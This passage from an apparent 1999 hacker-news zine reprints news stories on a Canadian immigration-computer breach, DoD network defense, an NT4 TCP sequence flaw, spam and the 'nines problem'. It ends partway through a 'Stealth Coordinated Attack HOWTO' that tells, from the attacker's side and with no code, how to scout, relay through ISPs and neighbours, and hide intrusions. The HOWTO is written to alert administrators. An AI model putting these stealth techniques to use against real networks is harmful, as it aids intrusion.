whole issue,'' Cpl. Read said. In a report marked ''Top Secret,''
he wrote: ''The loss of control of CAIPS ... loss of control over
immigration from Hong Kong ... from 1986 to 1992 is a most
serious breach of national security."

Cpl. Read, who has written orders from his boss, Inspector Jean
Dube, not to talk to the media, said: ''I am going public because
there needs to be a public inquiry into this whole thing.''

Officials would not confirm or deny the existence of an
investigation.

In fact, the investigation began in 1992, when the Department of
External Affairs sent to Hong Kong an electronic data processing
officer, David Balser, and RCMP Sergeant John Conohan.

According to Cpl. Read and Mr. McAdam, the two carried out a
cursory investigation. Neither Mr. Balser nor Mr. Conohan
recommended further investigations or criminal charges, despite
Mr. McAdam's reports, which indicated security breaches by
locally employed staff and the discovery of fake Canada
Immigration stamps in one of their desks.

Mr. Conohan was also told about local staff who had given
themselves unauthorized, top-level security clearance to access
the computer, according to one of Cpl. Read's reports.

Mr. Conohan reported that the suspect in whose desk the fake
stamps were found had fled to Taiwan, despite being given
information that she was living in B.C., some of the reports allege.

Documents also show that a second suspect, who operated the
CAIPS computer, fled her job in September, 1993, because of
gambling debts owed to Triads.

Mr. Balser's report is described by investigators familiar with the
allegations as ''unintelligible bureaucratese.''

He makes no express mention of the deleted files, fake stamps or
missing blank visas, which were included in Mr. McAdam's
reports.

Mr. Balser does talk about the potential for security breaches and
recommends that locally engaged staff not be given high security
clearance. He hints that someone could misuse blank visas, which
were left lying in open cardboard boxes, but does not report
allegations that at least 2,000 blank immigrant visas were found to
be missing.

Mr. Read alleges that Mr. Balser has told him on the record that
he was ordered to ''obfuscate'' his report. Mr. Balser is now
retired and could not be reached for comment.

Unable to get any answers to his concerns, Mr. McAdam
continued with his complaints and a series of RCMP investigators
were given the case and then abruptly transferred.

The Canadian Security Intelligence Service, was also brought in to
investigate Chinese espionage and together with the RCMP
launched Operation Sidewinder in 1995.

That operation, which was to look at the influence of Chinese
officials and tycoons at the Hong Kong mission, was also halted.

The investigation into the penetration of CAIPS is now being
conducted by Sergeant Sergio Pasin of the immigration and
passport section of the RCMP.

''If the RCMP does not tell the government that a disaster has
occurred, the government cannot decide how to react to it, cannot
decide when to tell the people of Canada what has occurred,''
said Cpl.

-=-

Vancouver Province;

'A breach of national
security'
Files at Canada's diplomatic mission in Hong Kong were
infiltrated Fabian Dawson, Staff Reporter The Province
Chinese nationals linked to organized crime have broken into the
immigration computer at Canada's diplomatic mission in Hong Kong,
classified documents obtained by The Province allege.

At least 788 files from the Computer-Assisted Immigration Processing
System (CAIPS) were deleted, and up to 2,000 blank visa forms have
disappeared, according to the documents.

The core allegations are:

- That certain people paid locally engaged staff of the Canadian
commission (now the consulate-general) to delete their backgrounds in the
computer system to hide their links with triads -- the Chinese Mafia.

- That the visa forms have been used by possibly hundreds of people,
including criminals, to enter Canada illegally.

For seven years, the RCMP, Immigration Canada and the department of
external affairs are alleged to have kept a lid on the case, unwilling to
reveal the extent of what several sources call a "breach of national
security."

Two key figures in the investigation suspect the RCMP is covering up
criminal acts and negligence at Canada's immigration office in Hong Kong.

Details of the case are contained in reports filed by Robert Read, an
RCMP corporal in Ottawa, and Brian McAdam, a former immigration
control officer at the Canadian commission in Hong Kong.

"I believe there has been a massive conspiracy to cover up the whole
issue," Read said.

In a report marked Top Secret, he wrote: "The loss of control of CAIPS .
. . loss of control over immigration from Hong Kong . . . from 1986 to
1992 is a most serious breach of national security."

Read, who has written orders from his boss, Insp. Jean Dube, not to talk
to the media, told The Province: "I am going public because there needs to
be a public inquiry into this whole thing."

Official spokesmen would not confirm or deny the existence of an
investigation.

In fact, the investigation began in 1992, when the department of external
affairs sent to Hong Kong an electronic data processing officer, David
Balser, and RCMP Sgt. John Conohan.

Read and McAdam say the two men carried out a cursory investigation.
Despite evidence indicating security breaches by locally employed staff and
the discovery of fake Immigration Canada stamps in one of their desks,
neither recommended further investigations.

Conohan was also told about local staff who had given themselves
unauthorized, top-level security clearance to access the computer,
according to one of Read's reports.

The sergeant reported that the suspect in whose desk the fake stamps
were found had fled to Taiwan, despite having been given information that
she was living in B.C., some of the reports allege.

Documents also show that a second suspect, a woman who operated the
CAIPS computer, fled her job in September 1993 because of gambling
debts owed to triads.

Balser's report, a copy of which The Province has obtained, is described
by sources familiar with the allegations as "unintelligible bureaucratese."

He makes no express mention of the deleted files, fake stamps, missing
blank visas or the disappearing local staff.

Balser does talk about the potential for security breaches and recommends
that locally engaged staff not be given high security clearance.

And he hints that someone could misuse blank visas, which were left lying
in open cardboard boxes, but does not report allegations that at least
2,000 blank immigrant visas were found to be missing.

Read, a Mountie for 24 years, alleged that Balser has told him on the
record that he (Balser) was ordered to "obfuscate" his report. Balser is
now retired.

Unable to get any answers to his concerns, McAdam continued with his
complaints. A series of RCMP investigators were given the case and then
abruptly transferred.

The Canadian Security and Intelligence Service, Canada's spy agency, was
brought in to investigate Chinese espionage. Together with the RCMP,
CSIS launched Operation Sidewinder in 1995. That operation, which was
to look at the influence of Chinese officials and tycoons at the Hong Kong
mission, was also abruptly halted.

The investigation into the penetration of CAIPS is now being conducted by
Sgt. Sergio Pasin of the immigration and passport section of the RCMP in
Ottawa.

"There is enough evidence in this case and in my other reports to initiate a
public inquiry . . . but for some reason nobody wants to do anything," said
McAdam.

"If the RCMP does not tell the government that a disaster has occurred,"
said Read, "the government cannot decide how to react to it, cannot
decide when to tell the people of Canada what has occurred.

"They have Balser's report, McAdam's testimony, the missing files in Hong
Kong . . . and my report.

"Why won't they do anything?"




@HWA


35.0 DoD Preps to Fight InfoCriminals Both Foreign and Domestic
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by mmuliin3
The Joint Task Force on Computer Network Defense
came to full strength in June and is in now ready
monitor the nations defense networks for cyber attack
regardless of where that attack may originate from. The
JTF-CND works out of Global Network Operations and
Security Center at Defense Information Systems Agency
headquarters in Arlington, Va. and is under the control
of Space Command. (Interesting quote in this article
"We don't get real worried about Web page hacks," said
Army Col. Larry Frank, chief of operations. "That's an
appearance issue." - Somehow I don't think he gets it.

Government Computer News
http://www.gcn.com/vol18_no27/news/440-1.html

August 23, 1999

DOD set to fight hackers both foreign and domestic

Task force monitors network to give department another layer of protection against cyberterrorism

By William Jackson
GCN Staff

When the Defense Department’s Joint Task Force on Computer Network Defense opened for business last
December, it found plenty to do.

“We have been at cyberwar for the last half-year,’’ deputy Defense secretary John Hamre said. “At least we had
a place to work on it.’’

Hamre spoke at ceremonies this month to mark the task force’s coming to full strength in June. Since then, an
interservice staff—supported by the DOD Computer Emergency Response Team, an intelligence cell and law
enforcement liaisons—has been monitoring the Defense Information Infrastructure around the clock. The task
force works out of the Global Network Operations and Security Center at Defense Information Systems Agency
headquarters in Arlington, Va.

So far, none of the cyberthreats has proved serious. But Hamre said DOD’s primary mission is to prepare for the
next battle, “buying the infrastructure in advance that we know we are going to need at some time.’’

Hamre has testified to Congress about the threat of what he called an electronic Pearl Harbor—an attack on the
nation’s information infrastructure. He said he was referring not to a devastating surprise attack but rather to
military preparedness.

“It wasn’t that we got hit, but that we were ready to respond,’’ Hamre said.

Warning signs

Until recently, DOD has not been ready to respond to a full-scale electronic
attack. Air Force Maj. Gen. John Campbell, DISA vice director and task
force commander, said the network defense unit grew out of the Eligible
Receiver 97 exercise in 1997, in which National Security Agency teams
waltzed into DOD systems using off-the-Internet hacking tools.

No one was then in charge of defending DOD networks, and it showed,
Campbell said. Awareness was reinforced by the monthlong Solar Sunrise
assault on DOD systems by a pair of teen-agers last year.

Today, “we are really serious about protecting our networks and our
systems,’’ Campbell said.

Although the task force is physically at DISA headquarters, organizationally it is part of the Space Command,
reporting to the commander-in-chief at Peterson Air Force Base, Colo. The task force uses DISA’s global
network management capability to monitor and analyze problems on DOD systems and coordinate responses.

“We don’t fix the computers; we look at the operational side,’’ said Army Col. Larry Frank, chief of operations.
“The other thing we bring to the table is command authority.’’ DISA has no authority over any of the services.

The task force this spring encountered the Melissa computer virus, which spread rapidly by e-mail and
threatened to swamp some DOD systems. The virus struck on a Friday, giving a two-day weekend buffer. The
Defense CERT responded with a patch to block the virus within 12 hours.

“We were lucky it wasn’t very damaging,’’ Frank said.

The task force was aware of hacks against DOD Web sites during the air
war in Kosovo, but they were not operationally significant, Frank said,
because DOD does not rely on the Web to carry out its missions.

“We don’t get real worried about Web page hacks,’’ he said. “That’s an
appearance issue.’’

The task force has a judge advocate on staff liaison officers from DOD
criminal investigative agencies.

It also maintains a working relationship with the FBI and other law
enforcement agencies. Most attacks come from the outside, Frank said,
and dealing with them is a law enforcement issue.

An attack from beyond U.S. borders might become an intelligence issue.

National jurisdictions are blurred in cyberspace, Frank said.

@HWA

36.0 Another Big Hole Found in NT
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/


contributed by newbie
NTA Monitor Ltd has discovered that Windows NT with
SP4 is vulnerable to Predictable IP Sequence Numbering,
also known as IP Spoofing. IP Spoofing is a technique
used to to make it appear that a user has a different IP
address than he is supposed to have.

NTA Monitor
http://www.nta-monitor.com/news/NT4-SP4.htm

Microsoft
http://support.microsoft.com/support/kb/articles/Q192/2/92.ASP

NTA Monitor

Leading Security testers ’NTA Monitor’ Discover Security Flaw in Microsoft NT4 SP4

25 August 1999

NTA Monitor Ltd have discovered a flaw (known as ‘Predictable TCP Sequence Numbering’) in Microsoft NT 4 when used with Service Pack 4 (SP4), which
means that it is vulnerable to a range of attacks known as ‘IP spoofing’. Microsoft‘s web site has referred to SP4 correcting a similar problem with NT4 SP3, but it
is now apparent that although there has indeed been a change to the sequence numbering method used, the new method is no more secure than SP3.

NTA Monitor Ltd came across the issue in the course of an external test (also known as a Penetration Test) of the security of an Internet gateway for one of it’s
over 100 corporate customers, performing the Regular Monitor test service. NTA Monitor reported to the customer the fact that one of their public servers
appeared from other tests to be NT based, but had a different predictable IP sequence problem. Following confirmation from the customer that NT4 SP4 was in
use, NTA then performed bench testing to confirm that the problem is generic to the product.

Further discussions with Microsoft took place over several weeks, and Microsoft have now confirmed NTA Monitor’s findings.

Microsoft will be addressing this issue and making it public so that systems administrators with NT4 SP4 in use can review what action they should take in light of
this new risk.

Each user needs to weigh up the risks from this flaw in their own particular network environment, and the impact from a potential security breach. Individual
decisions will need to be made as to whether to temporarily disable NT4 SP4 servers from Internet usage, or move to alternative non-NT platforms, or to continue
as is, with heightened observation of the servers.

NT4 is widely used on the Internet by organisations for public-facing servers such as Email hosts (using for example Microsoft Exchange) or Web servers (
Microsoft’s Internet information Server (IIS) has large number of users).

This flaw allows an attacker to communicate with the victim device whilst appearing to be another system, such as a trusted host or another system inside the
organisation’s network, and thus to circumvent the device’s protections against external Internet systems.

The simplest exploit possible would be sending ‘perfectly untraceable’ fake email - which will be received by staff at the victim site and be indistinguishable from a
genuine email from the faked email ‘From:’ address.

More serious exploits would include obtaining a remote log-in to systems as if from the organisation’s inside networks, and once achieved with further scope to
attempt to take full control of the victim system.

NTA Monitor will be posting news of this problem on a number of the Internet security mail lists and newsgroups.

Says NTA Monitor’s Testing Development Director Roy Hills:

"Although here at NTA Monitor we do a huge amount of security testing of corporate Internet security, we are not a security research company - and
so we were initially surprised to find such a flaw. It appears that no one else has spotted this before, and begs the question as to whether Microsoft
themselves did any testing after releasing SP4 for NT4...

"However, it simply highlights a message that we make every day - that active security testing is the only way to find out whether an organisation’ s
Internet perimeter is really providing the intended security - and this testing should be regular - monthly or quarterly.

"Every VP or Director of IT should ask to see their organisation's last Internet security test report.

"In fact many organisations have never had their security tested, and those that have tend to rely on an annual test - which is quite ineffective when you
consider the fact that there are typically 5 or 6 significant new Internet security risks every month, providing remote exploitation attacks on widely used
Internet software products."

@HWA

37.0 Korea to Block All Porn
~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Lamer
The Commission on Youth Protection in South Korea
yesterday said it will ask to have the 26 local Internet
service providers (ISPs) to ban access to all
pornography. ISPs defying the government ban will be
punished with up to two years in prison or 20 million won
in fines, plus the cancellation of their business licenses.

The Korea Herald
http://www.koreaherald.co.kr/news/1999/08/__02/19990826_0211.htm

Gov't to block online porn from abroad

The government has decided to ban pornographic material from being provided
by foreign servers over the Internet.

The Commission on Youth Protection, which folds under the Prime Minister's
Office, said yesterday it will seek to have about 26 local Internet service providers
(ISPs), such as KORNET, BORANet and NETSGO, block pornographic sites
provided through foreign servers.

Existing laws ban pornographic material by domestic servers. But between 50
and 100 sites carried by foreign servers have been virtually unrestrained, and
officials noted that domestic pornographic program providers have used the foreign
servers, exploiting the loophole that limit domestic laws from being able to govern
foreign-based servers.

The special measure involves two steps that aim to make lewd material
inaccessible to all Internet users in Korea.

"The idea is to make hard-core, violent and perverted pornography illegal for all
users, just as we do with printed material," Nam Hyung-ki, a commission member,
said.

To that end, the commission said that it will first ask the minister of information
and communications to decree an administrative order to the nation's ISPs to block
foreign pornographic sites early next year.

At the same time, the commission will require ISPs to develop technical devices
and measures, such as real-name user-ID systems, to sort out the minors among its
users. Both commission officials and industry insiders said that such a measure will
take some time to take root, suggesting that an all-out ban on Internet pornography
is a more likely scenario in the near future.

ISPs defying the government ban will be punished with up to two years in prison
or 20 million won in fines, plus the cancellation of their business licenses.

Meanwhile, industry insiders welcomed the announcement, but doubted that the
measures would be effective.

"It is technically possible, I guess, to block pornographic sites to minors. But
there will always be some loophole, some minor who will use his or her parents'
name to click on," an employee at one of the nation's 20 ISPs said.



Updated: 08/26/1999
by Kim Ji-soo Staff reporter

@HWA

38.0 Grammatically Challenged InfoCriminal Defaces Site
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/


contributed by Weld Pond
The Tucson Unified School District's web site was
defaced by what reporters have called a 'grammatically
challenged' individual. The defacement left obscenities,
misspellings, and grammar errors throughout the page.
Local officials are investigating.

Arizona Daily Star
http://www.azstarnet.com/public/dnews/121-8392.html
<this link is dead - Ed>

39.0 Bank Emails Virus to Investors
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Yazmon
Last Friday Fuji Bank Ltd in Japan accidently emailed a
computer virus to a few global investors. A
spokesperson for Fugi said that the email came from a
machine that is not normally used and therefore was
outside what they normally monitor. The virus, on the
14th day of each month would display the message "big
stupid jerk".

Financial Times
http://www.ft.com/hippocampus/q14554e.htm

Fuji Bank bugs investors with rude e-mail
By Gillian Tett and Alexandra Nusbaum in Tokyo

One of Japan's biggest banks
has embarrassed itself - and
risked insulting some of its key
investors - by e-mailing a
computer virus to dozens of fund
managers worldwide.

The e-mailed memo was part of a
public relations offensive by Fuji
Bank, which last week announced plans for a merger
with Industrial Bank of Japan and Dai-Ichi Kangyo Bank
to create the world's largest banking group.

The bug will make recipients' computers display a
message from Fuji Bank on the 14th day of each month
telling the viewer in English that he or she is "a big
stupid jerk!". It also changes some of the names in the
e-mail to "Dr Mountain Dew".

Fuji yesterday admitted it had inadvertently sent out a
virus to dozens of global investors in a memo describing
the three-way alliance. When it discovered what had
happened, it sent a second e-mail warning recipients
about the bug and the insulting message.

"I have never received anything like this from a Japanese
bank before," said Brian Waterhouse, analyst at HSBC
Securities.

"I have also never heard of a case of a Japanese bank
having a computer bug problem before. But I suppose
that's a sign of technological change, and them catching
up with the rest of the banking world."

A Fuji official said yesterday: "This computer bug is
absolutely no joke . . . we have never seen anything like
this before. We are determined that this will never
happen again."

The bank said it had eliminated the virus from its own
software. It denied suggestions that the bug might have
been the work of employees opposed to restructuring,
saying it had come from "outside sources".

Fuji had produced the merger announcement in such a
hurry that it had taken the unusual step of outsourcing
some of its information technology procedures rather
than relying on its own staff.

@HWA

40.0 IS YAHOO SPAM OR ANTI-SPAM ORIENTED?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/

by BHZ, Friday 27th August 1999 on 10:12 pm CET
Is Yahoo for spam or against it? According to Wired reporter Chris Oakes , they play
on the both sides of the coin. "Yahoo distributes the advice to users of its Yahoo
Store electronic storefront hosting service. The Web site instructs users on how to
send out unsolicited email to target promotional partners for their Yahoo-hosted
storefronts." Read very interesting article on it below

http://www.wired.com/news/news/technology/story/21461.html

Yahoo Two-Faced on Spam
by Chris Oakes

3:00 a.m. 27.Aug.99.PDT
Can the Web's most popular site be anti-spam and pro-spam all at the same time?

Anti-spammers say the contradiction is alive and well at Yahoo.


See also: Yahoo: Keep Your Homestead


"Anytime you're saying 'look for a list of people and send them an unsolicited message,' that's spam," said Peter Seebach, president, of tiny ISP
Plethora.net in St. Paul Minnesota.

Yahoo distributes the advice to users of its Yahoo Store electronic storefront hosting service. The Web site instructs users on how to send out
unsolicited email to target promotional partners for their Yahoo-hosted storefronts.

Seebach said he encountered the advisory pages on Yahoo after being led to the Yahoo pages by way of an anti-spam mailing list.

"Step one is to build a list of sites that you want to get links from," reads the page, which is entitled "Build Traffic with Incentives." It reads:

...For example, if you are selling products related to show dogs, search for show dog in all the search engines. Add those sites to your
list, then follow the links to find others.

The instructions then recommend emailing the webmasters to try to get them to link.

But using Yahoo's email service to spam these folks is a no-no, the instructions warn:

"Note: Don't use your Yahoo! Mail account to do this, because all unsolicited commercial email is forbidden by the Yahoo! Mail terms of
service."

"Although this type of mail isn't really spam in the usual sense of the word, it is unsolicited, and your account could be canceled for it if
someone complains."

Is there a contradiction here?

"We're not advocating a form message or mass distribution," said Tim Brady, executive producer of Yahoo. "What we're advocating is to use search
engines to find related sites, write those sites down, and contact them. Probably somewhere in there, there's a judgment call."

Seebach said these stances are all the more alarming because they contradict the company's overall opposition to spam.

"In a lot other contexts, Yahoo has been fairly solidly anti-spam. So it's sort of surprising."

But Brady said there is no disparity in its policies. "Yahoo Store's terms of service forbid spam, and we have shut down sites for spam. There have
only been a couple of cases."

"I think our policies are consistent."

But to Seebach, there is no question about the nature of Yahoo's advice. "They didn't say 'find one person.' They said 'find people' -- plural -- and
they acknowledge that they'd [the Yahoo Mail service] kick people off for it. The community standard is that that's considered spam."

Elsewhere in the customer advice, Yahoo Store also instructs users on how to get search engines to display a Yahoo Store site address higher in
the list of search results. This activity, widely considered to be corrupting search results, is similarly disdained by the Net community.

Nick Nicholas, executive director of the Mail Abuse Prevention System noted that Yahoo's recommendations on search results are once again
contradictory.

"It's particular surprising to have that come from Yahoo. Because people are trying this all the time with sites like Yahoo."

But Brady said the search advice is sound and not seeking to trick search engines.

"We're clearly not advocating putting any irrelevant words in there. It's more of an education about how search engines work. If you have your
front page and it's all graphics and your competitor's is all text -- and your trying to understand why your competitors come up first in a search
engine -- this is a great education. It's design guidelines."

He did acknowledge that the company may need to adjust the language of the instructions.

"We remain strongly anti-spam and nothing we suggest or promote is in any way spam like we believe.... But I can see where potentially there's a
bit of a gray area here."

A gray area is problematic when it comes to stemming the growth of the Net's huge spam problem, said J.D. Falk, board member of the Coalition
Against Unsolicited Commercial Email.

"The problem with a gray area is that there's so many spammers out there that anybody in the gray area -- some people are going to consider it
spam. My advice is to stay completely out of gray area until the complete mass of spam dies down."

Editors note: By late Thursday, after this story was written, the page described above was changed. Yahoo removed the paragraph encouraging
mass email and the note warning users not to use Yahoo for such mailings. Because the article was accurate when written, Wired News stands by
the story.

@HWA

41.0 "NINES PROBLEM"
~~~~~~~~~~~~~~~

From http://www.net-security.org/

by BHZ, Friday 27th August 1999 on 9:51 pm CET
Everybody is panicking over Y2K bug who will hit us in 4 months. But did you hear for
nines problem? At issue is the impact of an old programming convention that used
four nines in a row -- 9999 -- to tell computers to stop processing data or to perform a
special task. Read about it on Wired.

http://www.zdnet.com/zdnn/stories/news/0,4586,2322320,00.html


--------------------------------------------------------------
This story was printed from ZDNN,
located at http://www.zdnet.com/zdnn.
--------------------------------------------------------------

Will 9/9/99 create Y2K-like havoc?
By Jim Wolf, Reuters
August 27, 1999 7:16 AM PT
URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2322320,00.html

WASHINGTON -- A computer glitch that could cause system failures on Sept. 9 -- 9/9/99 -- is
about to get a lot of attention.

In a kind of dry run for the Year 2000 glitch, authorities and computer scientists worldwide will be
scrutinizing networks on that Thursday for any fallout from the so-called "Nines Problem."

At issue is the impact of an old programming convention that used four nines in a row -- 9999 --
to tell computers to stop processing data or to perform a special task.

End of file
In the relatively unlikely case that systems misread Sept. 9 as 9999 -- without zeros as in 09/09 --
they might confuse the nines with what programmers call an "end of file" marker.

Four nines in the date field could also trigger a grand total or a sorting operation, said Jim Kelton,
president of Software Unlimited, an Irvine, California, software consulting firm specialized in
networks and Y2K.

"All nines could be interpreted as almost anything," he said. For instance, the nines might cause
computers to disregard data received after Sept. 9, causing a cutoff in the updating of bank
records.

The glitch, which the financial industry has been fixing as part of its $9 billion Y2K preparations,
could figure in customized applications written in decades-old computer languages such as
FORTRAN, COBOL and RPG, experts say.

Robert Banghart, director of development at Unisolve, a Costa Mesa, California, software firm
working on the Y2K glitch, said a string of nines long had been used to tell computers to ''end a
routine,'' or no longer execute certain instructions.

Rehearsal for preparedness
In a worst-case scenario, four nines in a date field could spark problems not unlike Y2K, a coding
glitch that threatens to keep ill-prepared computers from distinguishing the year 2000 from the
year 1900.

The U.N.-backed International Y2K Cooperation Center, a global clearing house for millennium
bug data, is using Sept. 9 to rehearse a plan aimed at keeping up-to-the-minute tabs on how the
world is faring as it enters 2000.

"It's a dry run for the rollover date," said Lisa Pelegrin, spokeswoman for the Washington-based,
World Bank-funded center. "We will be testing our reporting system."

That reporting system, to be updated in real time on the center's Web site, www.iy2kcc.org,
ultimately will reflect the input of 170 or more national Y2K coordinators.

On the center's Sept. 9 shakeout run, about 15 countries are expected to take part. For the most
part, they are members of its steering committee -- Britain, Bulgaria, Chile, Gambia, Iceland,
Japan, Mexico, Morocco, Netherlands, Philippines, South Korea and the United States.

New Zealand and Australia, also active backers, are due to report in. Graeme Inchley, Australia's
Y2K coordinator, told Reuters that he was ``absolutely convinced'' Sept. 9 would go by without a
hitch.

First test for Y2K center
Sept. 9 also will mark the first test of a $40 million-dollar U.S. inter-agency Y2K center meant to
give U.S. decision makers a round-the-clock view of Y2K problems in their areas of
responsibility.

Likewise, on Sept. 8 and 9, the North American Electric Reliability Council, an industry group,
will rehearse an emergency scenario to test operating, communications and contingency responses
for the Y2K transition.

"If all goes well in this drill, the electric utilities can pat themselves on the back; if not, they may be
tempted to blame the 'nines','' said Janis Gogan, an information technology expert at Bentley
College in Waltham, Mass.

Mitch Ratcliffe, editorial director of publisher Ziff Davis's Y2K Web site, rated Sept. 9's chance
of triggering problems as extremely low because the date would have to be misrepresented --
without zeros as in 09/09 -- "in a way that defies logic."

"The Nines Problem is almost totally a myth," he said.

@HWA


42.0 Stealth Coordinated Attack HOWTO
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

This was emailed to us by the author and is a very well written piece full of important information for
the sysadmin and hacker alike, definately a must-read by all. - Ed


Contributed by Dragos Ruiu

note: this was written before the l0pht antisniff annoucement was made so that's why the future tense.
And I'm not talking about route table hijacking as the DHCP vulnerability :-).... cheers, --dr)

Cautionary Tales: Stealth Coordinated Attack HOWTO
By Dragos Ruiu

A lot has been written in the popular media about the effects of hostile coordinated traffic attacks
(hacking), and, as a sysadmin, I find my systems increasingly under attack by hostile sources. Two years
ago, we got mapped and port-scanned for vulnerabilities once a month. One year ago the scan frequency was
up to once a week, and these days we get scanned several times a day with real attack attempts at least
once a week. The Internet is becoming an increasingly hostile place and the traditional defenses and
documentation of attack systems seems woefully inadequate. With this article, I hope to remedy some of the
false misconceptions of security that some admins have. Yes, I hope that descriptions of these attack
techniques scare you into beefing up security on your home PC, at your office, everywhere. Over the last
fifteen or so years, as a sysadmin of network connected systems, I have seen the knowledge of computer
technologies propagate across the spectrum of human population, bringing with it the traditional demographic
including the stupid people, the malicious people as well as the helpful and the apathetic people.

With the burst of Internet technology over the last few years there has also been a burst of new computer
adoption, increasing pervasiveness of computing and networks and increasing occurrences and danger/damage
caused by hostile computer use. While I don't believe for a second the over-inflated, hyped-up estimates of
the cost of these hacker intrusions bandied in the media, I can vouch that the problem is real. As the chief
technical weenie of our company, NetSentry Technology, I've been manning the front line defenses of our company
net equipment. I've also been documenting the increasingly hostile nature of attacks on our network and would
like to share some of my experiences in this area. The technical level of the attacks is increasing at an
alarming pace, and I haven't seen any documentation of these new attack techniques yet, so here are some
cautionary tales culled from our real-life experiences. My hope is that after reading this you will re-examine
your own network security. Most organizations are woefully under-protected.

The ISPs are having increasing difficulties in responding to customer requests for assistance in intrusion cases
and the police are even further under-staffed and out-gunned technologically. So increasingly, it leaves companies
to fend for themselves to secure their systems. Here is what you have to worry about.

I wish I could take credit for all the techniques described here, but a majority of them were derived from
analysis of traffic used for hostile attacks on us. Credit belongs to the anonymous hackers that have taken a run
at our defenses. I write the following from the point of view of the attacker to emphasize the point that security
is vastly neglected at most sites and because I want to ask, what will you do when faced with these attacks? And
what can you do with your current defensive equipment? Not much, I wager.

The phases of a successful attack are A) Reconnaissance, B) Vulnerability identification, C) Penetration,
D) Control, E) Embedding, F) Data extraction/modification, and G) Attack relay.

A) Reconnaissance

The first part of a successful attack is to get to know the network topology in the region surrounding your
target and the parties it communicates to. This is also an important part of the penetration of each successive
layer of your target's networks. Currently, the best publicly available tool for net topology identification is
Fyodor's excellent "nmap" program and derivatives. The objective of the reconnaissance is to understand as much
about the target and to identify attack destinations defenses and potential attack relay bases.

In private circulation, the following tools exist or will soon exist:

Attack Tool: Coordinated multi-site scanners. Mapping software that distributes the mapping "probe" packets to be
sent to the destination addresses and nearby sites over a number of geographically dispersed attack sites, and
trickles them out at low rates to avoid detection so that there never is a lot of traffic at any one time or from
any particular site (see stealth section). The results of the pokes and probes at the target that these systems
send is summed and collated to build a picture of what equipment the target has installed. There was a lot of
noise in the press earlier this year as some of the crude versions of these coordinated scan tools were aimed at
US military sites, but either the operators of these tools have improved them to the point where the relatively
immature military defense systems no longer identify these scans, or the military has found some other threat to
highlight in the press and use to get funding.

Attack Tool: Sniffer Detectors. Sniffers produce unique traffic patterns that may be detected. They also provide
some interesting penetration vulnerabilities, as their network interfaces are placed in promiscuous mode, allowing
all packets past the address filters to be processed by network stacks and applications. Some attack methods
directly target security systems, which, ironically enough, are often notoriously insecure themselves. Once the
security system is penetrated, all kinds of nice information like traffic patterns and passwords may be gleaned,
and evidence of your attacks can be conveniently removed. And because of promiscuous listening in the sniffer you
can even take it out with traffic destined for a different system.

Attack Tool: DNS Zone transfer. A DNS zone lists the externally accessible points a company maintains. A nice map
of the externally visible systems that your target has put on the Internet and a great attack point list. Not many
sysadmins go over the name server records closely enough to detect this, however the more advanced intrusion
detection systems are getting better at identifying these kinds of transfers as pre-cursors to an attack.

The important information to gather is the DNS names and addresses of the target's hosts and neighbors. Then you
must further identify the OS and open port configuration of each of your target's systems. The latter is determined
using site scanners and analyzing the responses that a site delivers. Current tools such as "nmap" and "queso" are
getting very good at determining device, OS version and some network application configuration information from
careful analysis of the timing and contents of responses to probing or mapping traffic. The OS and port
configuration are used to identify systems that could have software packages with vulnerabilities and bugs open
for exploits.

Knowing who your target's ISPs are by analysis of address use can provide useful attack bases for your onslaught
Getting into their ISP's equipment and servers first could enable you to get important information about them and
if you can subvert equipment installed on the same network links as your target can let you glean important
information such as traffic patterns of your target. All without your target even suspecting. It may also be
easier to penetrate the ISP than a secure target. Some ISPs such as @Home even keep extensive (but often out of
date) databases listing customer's hardware and software configurations as well as other info, which if accessed
can mitigate some of the dangers of triggering intrusion detection systems with your site scanning traffic.

Once the traffic patterns of the target's external traffic are known, a basic technique to take out a secure target
is to first take over a less secure target that your main target talks to, and then come in to your main target
under the cover of that site's usual traffic. Any site your target talks to periodically, including popular web
sites, employee's dial-up accounts, and system traffic, such as network time protocol (NTP) clocks, are all
candidates for attack relays. Sprinkling in your attack traffic with large web downloads and ftp transfers will
make it more difficult for security personnel to use sniffing and detection tools to identify your attack, as
scrolling through reams of logs and captured data can often be more time consuming than possible with most network
staffing levels. Taking out and controlling your target's conversation peers can provide you with useful channels
through your target's defensive firewalls and detection systems. Your traffic will look on all the scanners like
that web-site the Joe in IT is surfing to, but will provide you with a nice channel right past all the firewalls to
a machine inside the core of your target's net.

One useful target is the DNS caches and servers that your target uses at your ISP. Accessing the DNS logs can give
you the addresses of all the sites that your target talks to, and furthermore, careful analysis can even give
indication of when the activity happened, or is happening, offering excellent potential for cover.

As we'll talk about later, owning the DNS server can have many benefits. In general the DNS servers are ripe with
hacking opportunities.

Another useful target is the ISP DHCP server, which is used to dynamically assign IP addresses to clients on
connection, as it can be used to identify periods of system activity from the logs, and also periodically
establishes connections to the client systems as the address leases expire. A common DHCP vulnerability also
allows client system takeover from this ISP host. DHCP address lease expiry also provides a nice way to signal
embedded attack software at pre-determined times to do things like wake up in the middle of the night and send
data when no-one is looking.

An often available source of useful relay bases for attacks is other systems in the same ISP client pool (on the
same modem bank, other ADSL users on the same DSLAM, or cablemodem users on the same segment), which are in many
cases default configuration, open like Swiss cheese, Windows systems - typically with file-sharing turned on and
personal web services enabled, a combination that sports a plethora of available vulnerabilities to exploit. After
taking out the easy "marshmallow" soft client PC, the adjacent main target can then be attacked using local subnet
attacks, offering again some potentially powerful techniques for hiding from and exploiting your target's security
systems. In easy cases, the equipment rack will bridge broadcast traffic between the "marshmallow" and the target,
allowing use of address resolution traffic such as ARP and DHCP to be used for system attacks and control. For
stealth, these kinds of attack bases are excellent too, because the broadcast traffic is largely repetitive, very
voluminous, and mostly uninteresting, which, combined with a great immaturity among the security tools for this
kind of traffic, make it a ripe vulnerability area. Local area broadcasts can also be used as another "mapping"
system too, even in passive listening to traffic at the nearby "marshmallow". By recording the address lookup
